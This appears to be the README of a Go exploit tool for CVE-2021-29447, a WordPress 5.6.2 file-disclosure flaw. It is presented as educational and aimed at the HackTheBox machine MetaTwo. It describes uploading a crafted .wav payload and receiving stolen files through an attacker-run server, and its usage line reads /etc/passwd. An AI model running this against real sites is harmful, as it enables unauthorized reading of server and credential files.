# exploit_cve-2021-29447
For educational purposes only.
This exploit is supposed to be really convenient tool to get any file from server running wordpress 5.6.2 and php8. (see https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)
All you need is base wp-admin access and ability to upload a media file.
The exploit will generate a .wav file payload to upload using wp-admin.
Then it uses exploit's back server to give you eager file right on your console.
The perfect usage is HackTheBox's machine - metatwo https://www.hackthebox.com/machines/metatwo
## Usage/Examples
```
$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Use local server ip where a local server will be set
-local-server-port int
Use local server port to run local server on
-o string
Output file to save exploit's result
-target-path string
Use target path to point on file you want to get from target server
$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd
```
[4.0K] /data/pocs/6f1d96de5581df75ee446f264276ae0f9759e7cb
├── [ 59] go.mod
├── [6.2K] main.go
├── [ 258] Makefile
├── [ 14M] preview.gif
└── [1.2K] README.md
0 directories, 5 files